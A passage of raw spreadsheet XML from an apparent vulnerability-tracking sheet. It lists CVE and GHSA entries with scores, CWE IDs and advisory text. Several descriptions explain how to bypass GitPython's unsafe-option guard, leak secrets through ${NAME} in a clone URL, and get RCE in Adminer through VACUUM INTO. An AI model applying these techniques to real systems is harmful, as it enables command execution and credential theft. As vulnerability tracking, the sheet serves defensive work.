t="n"><v>0.003</v></c><c r="I506" s="5" t="inlineStr" /><c r="J506" s="5" t="inlineStr" /><c r="K506" s="5" t="inlineStr" /><c r="L506" s="5" t="inlineStr" /><c r="M506" s="5" t="inlineStr" /><c r="N506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O506" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P506" s="5" t="inlineStr" /><c r="Q506" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R506" s="5" t="inlineStr"><is><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is></c><c r="S506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85626</t></is></c></row><row r="507"><c r="A507" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B507" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C507" s="5" t="inlineStr"><is><t>CVE-2026-85699</t></is></c><c r="D507" s="5" t="n"><v>8.699999999999999</v></c><c r="E507" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F507" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G507" s="5" t="inlineStr" /><c r="H507" s="5" t="n"><v>0.003</v></c><c r="I507" s="5" t="inlineStr" /><c r="J507" s="5" t="inlineStr" /><c r="K507" s="5" t="inlineStr" /><c r="L507" s="5" t="inlineStr" /><c r="M507" s="5" t="inlineStr" /><c r="N507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O507" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P507" s="5" t="inlineStr" /><c r="Q507" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R507" s="5" t="inlineStr"><is><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is></c><c r="S507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85699</t></is></c></row><row r="508"><c r="A508" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B508" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C508" s="5" t="inlineStr"><is><t>CVE-2026-85786</t></is></c><c r="D508" s="5" t="n"><v>8.699999999999999</v></c><c r="E508" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F508" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G508" s="5" t="inlineStr" /><c r="H508" s="5" t="n"><v>0.003</v></c><c r="I508" s="5" t="inlineStr" /><c r="J508" s="5" t="inlineStr" /><c r="K508" s="5" t="inlineStr" /><c r="L508" s="5" t="inlineStr" /><c r="M508" s="5" t="inlineStr" /><c r="N508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O508" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P508" s="5" t="inlineStr" /><c r="Q508" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="R508" s="5" t="inlineStr"><is><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is></c><c r="S508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85786</t></is></c></row><row r="509"><c r="A509" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B509" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C509" s="5" t="inlineStr"><is><t>CVE-2026-86173</t></is></c><c r="D509" s="5" t="n"><v>8.699999999999999</v></c><c r="E509" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F509" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G509" s="5" t="inlineStr" /><c r="H509" s="5" t="n"><v>0.004</v></c><c r="I509" s="5" t="inlineStr" /><c r="J509" s="5" t="inlineStr" /><c r="K509" s="5" t="inlineStr" /><c r="L509" s="5" t="inlineStr" /><c r="M509" s="5" t="inlineStr" /><c r="N509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O509" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P509" s="5" t="inlineStr" /><c r="Q509" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R509" s="5" t="inlineStr"><is><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is></c><c r="S509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86173</t></is></c></row><row r="510"><c r="A510" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B510" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C510" s="5" t="inlineStr"><is><t>CVE-2026-86177</t></is></c><c r="D510" s="5" t="n"><v>8.699999999999999</v></c><c r="E510" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F510" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G510" s="5" t="inlineStr" /><c r="H510" s="5" t="n"><v>0.003</v></c><c r="I510" s="5" t="inlineStr" /><c r="J510" s="5" t="inlineStr" /><c r="K510" s="5" t="inlineStr" /><c r="L510" s="5" t="inlineStr" /><c r="M510" s="5" t="inlineStr" /><c r="N510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O510" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P510" s="5" t="inlineStr" /><c r="Q510" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R510" s="5" t="inlineStr"><is><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is></c><c r="S510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86177</t></is></c></row><row r="511"><c r="A511" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B511" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C511" s="5" t="inlineStr"><is><t>CVE-2026-86193</t></is></c><c r="D511" s="5" t="n"><v>8.699999999999999</v></c><c r="E511" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F511" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G511" s="5" t="inlineStr" /><c r="H511" s="5" t="n"><v>0.002</v></c><c r="I511" s="5" t="inlineStr" /><c r="J511" s="5" t="inlineStr" /><c r="K511" s="5" t="inlineStr" /><c r="L511" s="5" t="inlineStr" /><c r="M511" s="5" t="inlineStr" /><c r="N511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O511" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P511" s="5" t="inlineStr" /><c r="Q511" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R511" s="5" t="inlineStr"><is><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is></c><c r="S511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86193</t></is></c></row><row r="512"><c r="A512" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B512" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C512" s="5" t="inlineStr"><is><t>CVE-2026-86195</t></is></c><c r="D512" s="5" t="n"><v>8.699999999999999</v></c><c r="E512" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F512" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G512" s="5" t="inlineStr" /><c r="H512" s="5" t="n"><v>0.002</v></c><c r="I512" s="5" t="inlineStr" /><c r="J512" s="5" t="inlineStr" /><c r="K512" s="5" t="inlineStr" /><c r="L512" s="5" t="inlineStr" /><c r="M512" s="5" t="inlineStr" /><c r="N512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O512" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P512" s="5" t="inlineStr" /><c r="Q512" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R512" s="5" t="inlineStr"><is><t>grav-plugi</t></is></c><c r="S512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86195</t></is></c></row><row r="513"><c r="A513" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B513" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C513" s="5" t="inlineStr"><is><t>CVE-2026-86196</t></is></c><c r="D513" s="5" t="n"><v>8.699999999999999</v></c><c r="E513" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F513" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G513" s="5" t="inlineStr" /><c r="H513" s="5" t="n"><v>0.003</v></c><c r="I513" s="5" t="inlineStr" /><c r="J513" s="5" t="inlineStr" /><c r="K513" s="5" t="inlineStr" /><c r="L513" s="5" t="inlineStr" /><c r="M513" s="5" t="inlineStr" /><c r="N513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O513" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P513" s="5" t="inlineStr" /><c r="Q513" s="5" t="inlineStr"><is><t>CWE-290</t></is></c><c r="R513" s="5" t="inlineStr"><is><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is></c><c r="S513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86196</t></is></c></row><row r="514"><c r="A514" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C514" s="5" t="inlineStr"><is><t>CVE-2026-86727</t></is></c><c r="D514" s="5" t="n"><v>8.699999999999999</v></c><c r="E514" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F514" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G514" s="5" t="inlineStr" /><c r="H514" s="5" t="n"><v>0.003</v></c><c r="I514" s="5" t="inlineStr" /><c r="J514" s="5" t="inlineStr" /><c r="K514" s="5" t="inlineStr" /><c r="L514" s="5" t="inlineStr" /><c r="M514" s="5" t="inlineStr" /><c r="N514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P514" s="5" t="inlineStr" /><c r="Q514" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R514" s="5" t="inlineStr"><is><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is></c><c r="S514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t></is></c></row><row r="515"><c r="A515" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C515" s="5" t="inlineStr"><is><t>CVE-2026-86732</t></is></c><c r="D515" s="5" t="n"><v>8.699999999999999</v></c><c r="E515" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F515" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G515" s="5" t="inlineStr" /><c r="H515" s="5" t="n"><v>0.005</v></c><c r="I515" s="5" t="inlineStr" /><c r="J515" s="5" t="inlineStr" /><c r="K515" s="5" t="inlineStr" /><c r="L515" s="5" t="inlineStr" /><c r="M515" s="5" t="inlineStr" /><c r="N515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P515" s="5" t="inlineStr" /><c r="Q515" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R515" s="5" t="inlineStr"><is><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is></c><c r="S515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t></is></c></row><row r="516"><c r="A516" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C516" s="5" t="inlineStr"><is><t>CVE-2026-86738</t></is></c><c r="D516" s="5" t="n"><v>8.699999999999999</v></c><c r="E516" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G516" s="5" t="inlineStr" /><c r="H516" s="5" t="n"><v>0.003</v></c><c r="I516" s="5" t="inlineStr" /><c r="J516" s="5" t="inlineStr" /><c r="K516" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L516" s="5" t="inlineStr" /><c r="M516" s="5" t="inlineStr" /><c r="N516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P516" s="5" t="inlineStr" /><c r="Q516" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R516" s="5" t="inlineStr"><is><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is></c><c r="S516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t></is></c></row><row r="517"><c r="A517" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B517" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C517" s="5" t="inlineStr"><is><t>GHSA-2rrw-hpqm-36pv</t></is></c><c r="D517" s="5" t="n"><v>8.699999999999999</v></c><c r="E517" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F517" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G517" s="5" t="inlineStr" /><c r="H517" s="5" t="inlineStr" /><c r="I517" s="5" t="inlineStr" /><c r="J517" s="5" t="inlineStr" /><c r="K517" s="5" t="inlineStr" /><c r="L517" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M517" s="5" t="inlineStr" /><c r="N517" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O517" s="5" t="inlineStr" /><c r="P517" s="5" t="inlineStr" /><c r="Q517" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="R517" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rrv8-h7p8-rx55. This link is maintained to preserve external references.

## Original Description
NLTK versions before 3.10.0 contain a regular expression denial of service vulnerability in Text.findall() and TokenSearcher.findall() methods that accept user-supplied regular expressions without validation or timeout. Attackers can supply crafted regex patterns that cause catastrophic backtracking, resulting in indefinite CPU saturation and denial of service to all users of the Python process.</t></is></c><c r="S517" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2rrw-hpqm-36pv</t></is></c></row><row r="518"><c r="A518" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B518" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C518" s="5" t="inlineStr"><is><t>GHSA-6r2r-ww24-7h52</t></is></c><c r="D518" s="5" t="n"><v>8.699999999999999</v></c><c r="E518" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F518" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G518" s="5" t="inlineStr" /><c r="H518" s="5" t="inlineStr" /><c r="I518" s="5" t="inlineStr" /><c r="J518" s="5" t="inlineStr" /><c r="K518" s="5" t="inlineStr" /><c r="L518" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M518" s="5" t="inlineStr" /><c r="N518" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O518" s="5" t="inlineStr" /><c r="P518" s="5" t="inlineStr" /><c r="Q518" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R518" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-2f96-g7mh-g2hx. This link is maintained to preserve external references.

## Original Description

GitPython before 3.1.51 contains an incomplete command injection blocklist that fails to account for git's long-option prefix abbreviation feature. Attackers can bypass the unsafe options guard by using abbreviated option names like upload_p instead of upload_pack, which git resolves to dangerous options and executes arbitrary commands.</t></is></c><c r="S518" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-6r2r-ww24-7h52</t></is></c></row><row r="519"><c r="A519" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B519" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C519" s="5" t="inlineStr"><is><t>GHSA-7r39-6q8m-qw68</t></is></c><c r="D519" s="5" t="n"><v>8.699999999999999</v></c><c r="E519" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F519" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G519" s="5" t="inlineStr" /><c r="H519" s="5" t="inlineStr" /><c r="I519" s="5" t="inlineStr" /><c r="J519" s="5" t="inlineStr" /><c r="K519" s="5" t="inlineStr" /><c r="L519" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M519" s="5" t="inlineStr" /><c r="N519" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O519" s="5" t="inlineStr" /><c r="P519" s="5" t="inlineStr" /><c r="Q519" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R519" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-8mcc-hrx5-hvxc. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.</t></is></c><c r="S519" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-7r39-6q8m-qw68</t></is></c></row><row r="520"><c r="A520" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B520" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C520" s="5" t="inlineStr"><is><t>GHSA-j95f-988m-3j2f</t></is></c><c r="D520" s="5" t="n"><v>8.699999999999999</v></c><c r="E520" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F520" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G520" s="5" t="inlineStr" /><c r="H520" s="5" t="inlineStr" /><c r="I520" s="5" t="inlineStr" /><c r="J520" s="5" t="inlineStr" /><c r="K520" s="5" t="inlineStr" /><c r="L520" s="5" t="inlineStr"><is><t>npm:@tiptap/core</t></is></c><c r="M520" s="5" t="inlineStr"><is><t>3.30.5</t></is></c><c r="N520" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O520" s="5" t="inlineStr" /><c r="P520" s="5" t="inlineStr" /><c r="Q520" s="5" t="inlineStr"><is><t>CWE-400, CWE-1333</t></is></c><c r="R520"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S520" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-j95f-988m-3j2f</t></is></c></row><row r="521"><c r="A521" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B521" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C521" s="5" t="inlineStr"><is><t>GHSA-m4f3-g4cq-hqrx</t></is></c><c r="D521" s="5" t="n"><v>8.699999999999999</v></c><c r="E521" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F521" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G521" s="5" t="inlineStr" /><c r="H521" s="5" t="inlineStr" /><c r="I521" s="5" t="inlineStr" /><c r="J521" s="5" t="inlineStr" /><c r="K521" s="5" t="inlineStr" /><c r="L521" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M521" s="5" t="inlineStr" /><c r="N521" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O521" s="5" t="inlineStr" /><c r="P521" s="5" t="inlineStr" /><c r="Q521" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R521" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rwj8-pgh3-r573. This link is maintained to preserve external references.

## Original Description

GitPython before 3.1.52 is vulnerable to environment-variable exfiltration in Repo.clone_from(). The caller-supplied remote URL is passed through Git.polish_url(), which on non-Cygwin platforms calls os.path.expandvars() on the URL before invoking git clone. An attacker who controls the clone URL can embed $NAME or ${NAME} tokens that are expanded to the values of the hosting process's environment variables (e.g., AWS_SECRET_ACCESS_KEY or GITHUB_TOKEN). The resulting URL, now containing the secret, is transmitted over the network to an attacker-controlled host during the clone attempt, disclosing the secret.</t></is></c><c r="S521" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-m4f3-g4cq-hqrx</t></is></c></row><row r="522"><c r="A522" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B522" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C522" s="5" t="inlineStr"><is><t>GHSA-wv46-xpj8-pw53</t></is></c><c r="D522" s="5" t="n"><v>8.699999999999999</v></c><c r="E522" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F522" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G522" s="5" t="inlineStr" /><c r="H522" s="5" t="inlineStr" /><c r="I522" s="5" t="inlineStr" /><c r="J522" s="5" t="inlineStr" /><c r="K522" s="5" t="inlineStr" /><c r="L522" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M522" s="5" t="inlineStr" /><c r="N522" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O522" s="5" t="inlineStr" /><c r="P522" s="5" t="inlineStr" /><c r="Q522" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R522" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-wvpp-8hx9-p66j. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.58 contains a command execution vulnerability in the check_unsafe_options guard that can be bypassed by combining a single-character kwarg with split_single_char_options=False. Attackers can supply a crafted kwargs dictionary to guarded methods like clone_from to emit a joined token parsed as --upload-pack, enabling arbitrary OS command execution at default allow_unsafe_options=False.</t></is></c><c r="S522" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-wv46-xpj8-pw53</t></is></c></row><row r="523"><c r="A523" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B523" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C523" s="5" t="inlineStr"><is><t>CVE-2024-35585</t></is></c><c r="D523" s="5" t="n"><v>8.6</v></c><c r="E523" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F523" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G523" s="5" t="inlineStr" /><c r="H523" s="5" t="n"><v>0.003</v></c><c r="I523" s="5" t="inlineStr" /><c r="J523" s="5" t="inlineStr" /><c r="K523" s="5" t="inlineStr" /><c r="L523" s="5" t="inlineStr" /><c r="M523" s="5" t="inlineStr" /><c r="N523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O523" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P523" s="5" t="inlineStr" /><c r="Q523" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R523" s="5" t="inlineStr"><is><t>Oxford Nanopore MinKNOW before 24.06 relies on a client's source IP address for authentication.</t></is></c><c r="S523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2024-35585</t></is></c></row><row r="524"><c r="A524" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C524" s="5" t="inlineStr"><is><t>CVE-2026-34223</t></is></c><c r="D524" s="5" t="n"><v>8.6</v></c><c r="E524" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F524" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G524" s="5" t="inlineStr" /><c r="H524" s="5" t="n"><v>0.001</v></c><c r="I524" s="5" t="inlineStr" /><c r="J524" s="5" t="inlineStr" /><c r="K524" s="5" t="inlineStr" /><c r="L524" s="5" t="inlineStr" /><c r="M524" s="5" t="inlineStr" /><c r="N524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P524" s="5" t="inlineStr" /><c r="Q524" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R524" s="5" t="inlineStr"><is><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is></c><c r="S524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t></is></c></row><row r="525"><c r="A525" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B525" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C525" s="5" t="inlineStr"><is><t>CVE-2026-56703</t></is></c><c r="D525" s="5" t="n"><v>8.6</v></c><c r="E525" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F525" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G525" s="5" t="inlineStr" /><c r="H525" s="5" t="n"><v>0.011</v></c><c r="I525" s="5" t="inlineStr" /><c r="J525" s="5" t="inlineStr" /><c r="K525" s="5" t="inlineStr" /><c r="L525" s="5" t="inlineStr" /><c r="M525" s="5" t="inlineStr" /><c r="N525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O525" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P525" s="5" t="inlineStr" /><c r="Q525" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R525" s="5" t="inlineStr"><is><t>Adminer before 5.4.3 contains a remote code execution vulnerability in SQLite query handling where VACUUM INTO is not blocked despite ATTACH restrictions. Authenticated attackers can execute VACUUM INTO to write PHP code to arbitrary file paths and execute commands on the server.</t></is></c><c r="S525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56703</t></is></c></row><row r="526"><c r="A526" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C526" s="5" t="inlineStr"><is><t>CVE-2026-61517</t></is></c><c r="D526" s="5" t="n"><v>8.6</v></c><c r="E526" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F526" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G526" s="5" t="inlineStr" /><c r="H526" s="5" t="n"><v>0.016</v></c><c r="I526" s="5" t="inlineStr" /><c r="J526" s="5" t="inlineStr" /><c r="K526" s="5" t="inlineStr" /><c r="L526" s="5" t="inlineStr" /><c r="M526" s="5" t="inlineStr" /><c r="N526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P526" s="5" t="inlineStr" /><c r="Q526" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R526" s="5" t="inlineStr"><is><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is></c><c r="S526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t></is></c></row><row r="527"><c r="A527" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B527" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C527" s="5" t="inlineStr"><is><t>CVE-2026-64199</t></is></c><c r="D527" s="5" t="n"><v>8.6</v></c><c r="E527" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F527" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G527" s="5" t="inlineStr" /><c r="H527" s="5" t="n"><v>0.001</v></c><c r="I527" s="5" t="inlineStr" /><c r="J527" s="5" t="inlineStr" /><c r="K527" s="5" t="inlineStr" /><c r="L527" s="5" t="inlineStr" /><c r="M527" s="5" t="inlineStr" /><c r="N527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O527" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P527" s="5" t="inlineStr" /><c r="Q527" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R527" s="5" t="inlineStr"><is><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is></c><c r="S527" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64199</t></is></c></row><row r="528"><c r="A528" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B528" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C528" s="5" t="inlineStr"><is><t>CVE-2026-70626</t></is></c><c r="D528" s="5" t="n"><v>8.6</v></c><c r="E528" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F528" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G528" s="5" t="inlineStr" /><c r="H528" s="5" t="n"><v>0.002</v></c><c r="I528" s="5" t="inlineStr" /><c r="J528" s="5" t="inlineStr" /><c r="K528" s="5" t="inlineStr" /><c r="L528" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M528" s="5" t="inlineStr"><is><t>3.9.4</t></is></c><c r="N528" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O528" s="5" t="inlineStr" /><c r="P528" s="5" t="inlineStr" /><c r="Q528" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R528"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S528" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t></is></c></row><row r="529"><c r="A529" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B529" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C529" s="5" t="inlineStr"><is><t>CVE-2026-71504</t></is></c><c r="D529" s="5" t="n"><v>8.6</v></c><c r="E529" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F529" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G529" s="5" t="inlineStr" /><c r="H529" s="5" t="n"><v>0.003</v></c><c r="I529" s="5" t="inlineStr" /><c r="J529" s="5" t="inlineStr" /><c r="K529" s="5" t="inlineStr" /><c r="L529" s="5" t="inlineStr" /><c r="M529" s="5" t="inlineStr" /><c r="N529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O529" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P529" s="5" t="inlineStr" /><c r="Q529" s="5" t="inlineStr"><is><t>CWE-862, CWE-915</t></is></c><c r="R529" s="5" t="inlineStr"><is><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is></c><c r="S529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71504</t></is></c></row><row r="530"><c r="A530" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C530" s="5" t="inlineStr"><is><t>CVE-2026-74239</t></is></c><c r="D530" s="5" t="n"><v>8.6</v></c><c r="E530" s="5" 